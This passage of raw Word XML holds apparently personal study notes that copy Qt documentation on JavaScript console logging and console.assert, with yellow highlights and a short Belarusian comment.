          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> f</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a</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b</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w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="003613F0" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>console</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"a is "</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"b is "</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> b</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>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162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The output is generated using the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId3011" w:anchor="qDebug" w:history="1">
        <w:r w:rsidRPr="00162275">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qDebug</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId3012" w:anchor="qWarning" w:history="1">
        <w:r w:rsidRPr="00162275">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qWarning</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId3013" w:anchor="qCritical" w:history="1">
        <w:r w:rsidRPr="00162275">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qCritical</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>methods in C++ (see also</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId3014" w:history="1">
        <w:r w:rsidRPr="00162275">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Debugging Techniques</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2724" w:name="assert"/>
      <w:bookmarkStart w:id="2725" w:name="_Toc483604459"/>
      <w:bookmarkStart w:id="2726" w:name="_Toc483605679"/>
      <w:bookmarkEnd w:id="2724"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Assert</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2725"/>
      <w:bookmarkEnd w:id="2726"/>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="003613F0" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>console.assert</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tests that an expression is true</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If not, it will write an optional message to the console and print the stack trace.</w:t>
      </w:r>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>вось я і зразумеў асерты</w:t>
      </w:r>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> f</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w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> x </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w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="003613F0" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>console</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assert</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">x </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"This will pass"</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="003613F0" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  console</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
